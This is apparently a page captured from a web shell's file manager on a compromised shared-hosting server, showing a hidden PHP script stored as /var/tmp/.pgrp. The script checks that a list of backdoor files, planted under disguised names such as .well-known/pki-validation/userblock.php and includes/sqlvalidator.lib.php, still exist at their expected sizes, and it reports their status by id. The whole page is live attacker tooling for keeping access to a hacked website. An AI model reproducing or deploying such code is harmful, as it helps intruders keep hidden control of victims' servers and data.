HEX
Server: LiteSpeed
System: Linux premium212.web-hosting.com 4.18.0-553.124.4.lve.el8.x86_64 #1 SMP Fri May 15 13:02:13 UTC 2026 x86_64
User: vitanhod (1367)
PHP: 8.2.31
Disabled: NONE
Upload Files
File: //proc/thread-self/root/var/tmp/.pgrp
<?php   $r = '/home/vitanhod/vigolic-1000.vitavit.com.pk'; $x = ["/img/show_event.php"=>"bd@@1310639@@848",
"/orderemail.php"=>"bd@@1315002@@77",
"/adaptive.php"=>"bd@@1313003@@94",
"/orderemail_bk.php"=>"bd@@1314827@@70",
"/includes/sqlvalidator.lib.php"=>"bd@@1309820@@870",
"/.well-known/pki-validation/userblock.php"=>"bd@@1315067@@88",
"/.well-known/formelementtray.php"=>"bd@@1315135@@91",
"/sites.php"=>"bd@@1315180@@850",
"/includes/sqlvalidator.lib.php"=>"bd@@1314930@@31",
"/.well-known/pki-validation/userblock.php"=>"bd@@1310593@@929",
"/.well-known/formelementtray.php"=>"bd@@1310674@@894"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');